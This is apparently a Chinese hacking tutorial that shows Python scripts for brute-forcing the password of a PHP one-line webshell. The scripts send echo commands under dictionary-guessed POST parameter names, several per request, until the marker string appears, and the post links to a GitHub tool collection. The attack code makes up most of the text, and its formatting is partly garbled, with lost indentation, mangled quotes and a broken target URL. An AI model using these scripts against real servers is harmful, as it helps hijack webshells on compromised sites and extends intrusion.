00×1:
需要用到的模块如下:
import requests
00×2:
首先我们了解一下一句话木马,一般post传递参
一个简单的php一句话木马
先测试一下连接
OK,没问题,我们用浏览器打开传参看一下
由此可以看到密码为x,变量提交能匹配上即执行 echo 语句
这时我猜大家都有了思路,构造post请求即可
00×3:
这里我们可以利用网址特性提交多个参数
这样可以提高爆破效率
分析完成,下面我们开始进行写脚本
00×4:
简单爆破 shell 密码,shell为字典
#!/usr/bin/ python
#-*- coding:utf-8 -*-
import requests
def req(url,s):
global html
data = {s:’echo xc666;’}
req = requests.post(url,data=data)
html = req.content
shell = [‘z’,’y’,’x’]
for s in shell:
req(‘#39;,s)
if ‘xc666’ in html:
print “[+]Find password”,s
break
00×5:
下面我们按我们刚才说的,一次多个参数,增加效率
首先整理一下字典
shell = []
f = open (‘shell.txt’,’r’)
for x in f.readlines(): #去除换行等字符
x = x.strip()
shell.append(x)
print u”shell密码个数为:”,len(shell)
for i in range(0,len(shell),2): #分割列表
b=shell[i:i+2]
print b
我们一次性提交两个参数测试一下
data = {s:’echo %s;’%s,ss:’echo %s;’%ss}
shell = []
def shelllist():
f = open(‘shell.txt’,’r’)
for x in f.readlines(): #去除换行等字符
x = x.strip()
shell.append(x)
print u”shell密码个数为:”,len(shell)
def main():
shelllist()
for i in range(0,len(shell),2): #分割列表
b=shell[i:i+2]
req(‘#39;,b[0],b[1])
if b[0] in html:
print “[+]Find password”,b[0]
break
elif b[1] in html:
print “[+]Find password”, b[1]
break
main()
测试一下,一次执行两个密码
00×6:
https:// github .com/hackxc/Pyhacker/
github项目地址
一次爆破5次密码,可自行调整